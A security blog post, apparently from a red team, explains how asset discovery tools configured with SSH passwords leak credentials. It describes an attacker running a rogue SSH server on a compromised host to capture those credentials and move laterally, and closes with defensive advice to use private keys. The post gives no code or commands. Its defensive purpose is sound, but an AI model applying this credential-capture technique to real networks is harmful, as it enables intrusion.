Our industry pays lots of attention to vulnerabilities and the need for patching. And yes, there is a need for this. But in the past couple decades, we’ve over-indexed on vulnerability management. What doesn’t get as much media coverage, and is often more important to an attacker, are things like common misconfigurations or an improper implementation that introduces unintended risk. Improper implementations can be very problematic for an organization to understand the ramifications of, near impossible to spot, and even more problematic to fix.
We regularly encounter improper implementations within our customers’ networks, suggesting many blue-teamers are unaware of the risks of certain configuration methods. As an attacker myself, I can say with confidence that some vendor-recommended implementation strategies are widely abused by red-teamers and attackers to achieve different objectives. The first time I took advantage of something like this was in the early 2000s, and in some cases, there is tooling available to take advantage of it. Weak configurations like this are a categorical risk to organizations, and I’m hoping that by talking about it, I can help close the knowledge gap between red-teamers and blue-teamers.
I’m going to take you through how vendor documented implementation methods — that are commonly used by IT orgs — can introduce unintended risk into your environment, with a focus on a particular type of asset discovery configuration that makes it easy for an attacker like me to move laterally in an organization.
First, a quick definition of lateral movement (if you know what this is skip ahead). Lateral movement is a term used to explain the techniques attackers use to move through a network as they explore systems attempting to gain further access or compromise sensitive information en route to their objectives. In my role as an attacker, I will take advantage of misconfigured systems, default credentials, exploits for unmanaged or unpatched systems, or all of the above. I will use whatever means available to compromise other systems on the network or “move” laterally.
Enter asset discovery tools to help with configuration management (CM). Organizations have rightfully started using auto-discovery tools in order to find services, applications, and devices in order to mitigate these types of exposures before attackers can take advantage of them. These tools are meant to give companies a better understanding of what systems are on their network, their patch level, and how the systems are configured. These CM and discovery tools programmatically log into systems and run commands to check their configuration.
Unfortunately, these types of asset discovery tools, when configured improperly, can increase the risk to an organization rather than reduce it, by further exposing an organization to lateral movement activities by an attacker. Worse yet, these implementation options may even be a documented solution. Therefore, it is important for organizations to understand the risks these configurations expose and consider them accordingly. Before publishing this blog, we reached out to each of the vendors in advance to see if they’d be open to updating their documentation to provide clearer guidance on the security risks associated with these configurations. As of the time of publication, none of the vendors named in this blog expressed interest in updating their documentation.
I want to be very clear that ServiceNow Discovery is not vulnerable or bad, nor is Virima or BMC Helix Discovery (other asset discovery tools that suggest similar implementations). In fact, they are very useful and practical tools for IT and security practitioners. And, this technique is not new or novel in any way. This is simply a concrete example I have exploited, and is utilized here to demonstrate the point. I’d also like to point out that faulty implementation practices don’t just happen with asset discovery solutions — we see this across a variety of IT and security tools. But we’ll save that for a different time.
The Problem
When ServiceNow Discovery, BMC Helix Discovery or Virmia are configured with password credentials rather than a private key, they can be leveraged by an attacker (at relatively low risk) to move laterally. Said another way, using the password credentials configuration method can easily be taken advantage of by an attacker. And, it’s low risk to a hacker (like me) for a multitude of reasons:
- I don’t have to make an exploit (which is expensive and takes time).
- I can just sit on the network and it will give me credentials – I don’t have to do any discovery or port scanning.
- I won’t trigger an alert. In many cases alerts associated with discovery tools are ignored or disabled because they are considered benign (and with good reason).
- I don’t have to brute force entry (which could trigger alerts).
ServiceNow Discovery Example
ServiceNow Discovery explores UNIX and Linux devices utilizing SSH to execute commands on the system in question. In order to run the exploratory commands, “Discovery” must have some sort of credential in order to access the system. ServiceNow’s documentation has two ways to configure these credentials. One is username and password — the other is via an SSH key. It is more secure to use SSH private key credentials rather than an SSH password, but password credentials are often preferred because they are easier to configure. In fact, the ServiceNow Discovery documentation does explicitly state: “SSH private key credentials are recommended over SSH password credentials for security reasons.” However, it doesn’t go into detail.
ServiceNow Discovery Documentation
BMC Helix Discovery Documentation
Virima Documentation (the screenshot above is no longer live on their site)
Before we go on to the example, let’s take a moment to explain why private key SSH authentication is more secure than passwords. (If you already know why, skip ahead). Private key authentication allows an SSH client to authenticate to an SSH server using a cryptographic key instead of a password. One advantage of private key authentication is that the algorithm prevents an attacker from replaying that authentication session, whereas with username/password authentication an attacker who can observe the login process has access to all the information needed to authenticate as the original client.
People use passwords more than private keys because of the ease of deployment. Simply add an account to the system with a password and you’re in. Private key authentication has the extra steps of generating the key pair, protecting the private key, and copying the public key into place on the server systems.
The Scenario
Let’s assume that, as the attacker, I have gained access to a network by compromising a Linux system and am looking to move laterally to other systems. I begin by quietly observing or sniffing the network traffic with the goal of gaining situational awareness attempting to figure out what I can see and what I have access to.
While watching network traffic, I notice an IP address attempting to connect to my compromised system on TCP port 22 (the default port for SSH servers.) So, I know somebody or something is attempting to login via SSH. I quickly spin up an SSH server I control and wait. Eventually that something that logs into me is the aforementioned asset discovery system with plain text username and passwords.
Often the username for these types of asset discovery tools references the product in some way. For instance `ServiceNowUser`. Just armed with that information, I know those credentials likely work on other *nix systems (UNIX, MacOS, FreeBSD, linux) and users are trained to ignore logins from that user.
Now I’m off to the races — I can steal leaked credentials and move laterally to other systems on the network, with little operational risk. And credentials are often used to verify patch states and system configurations, thus I have access to that data on each system, giving me a lot more information to do my job easily and stealthily.
Takeaways
For anyone implementing a new technology – especially an asset discovery solution – consider taking the extra time to configure using a private key vs. a password (more on the advantages here). Review documentation thoroughly and pay special attention to best practices. Ask your vendor to give more details on security best practices if they aren’t included in the documentation.
Some configurations may be quick wins for a project, but be careful – you may inadvertently give away the keys to the kingdom. Sometimes it’s not worth the risk, and better to take on a more thorough implementation for security purposes. The details are important to understanding what risk you are accepting, which clearly need to be communicated to management — especially if you intend on taking the easier route.
For the c-suite, any software that is used on a network should be viewed as part of the attack surface, and thus must be considered when calculating risk. Purchasing a tool is not the solution to the problem, and may in fact cause more harm than good. You must allow teams the time to understand the ramifications of a product, how to properly implement, and how to utilize tools properly in your environment. Recognize the risk you’re taking if you’re asking your team to implement something on a shorter timeframe — that often means not as secure.
To read more posts like this from the Randori Attack Team, check out their ongoing TTP series (Tools, Techniques & POCS)